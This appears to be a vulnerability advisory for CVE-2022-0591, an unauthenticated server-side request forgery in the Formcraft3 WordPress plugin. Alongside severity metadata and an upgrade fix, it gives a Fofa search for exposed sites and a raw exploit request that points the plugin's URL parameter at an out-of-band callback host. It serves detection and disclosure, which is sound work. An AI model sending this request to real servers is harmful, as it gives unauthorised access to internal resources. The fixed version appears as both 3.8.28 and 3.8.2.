| Title | Formcraft3 <3.8.28 - Server-Side Request Forgery |
|---|---|
| Author | Akincibor,j4vaovo |
| Severity | Critical |
| Impact | An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning. |
| Remediation | Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability. |
| CVSS Score | 9.1 |
| EPSS Score | 0.87898 |
| CVE ID | CVE-2022-0591 |
| CWE ID | CWE-918 |
| Fofa Query | body="formcraft3" && body="wp-" |
| Tags | cve cve2022 wp wp-plugin wordpress formcraft3 wpscan ssrf unauth subtlewebinc vkev vuln |
Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://d5jlqiple0o4a0390770y7artfaruwnwy.oast.pro HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0591.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0591.pcap
N/AN/A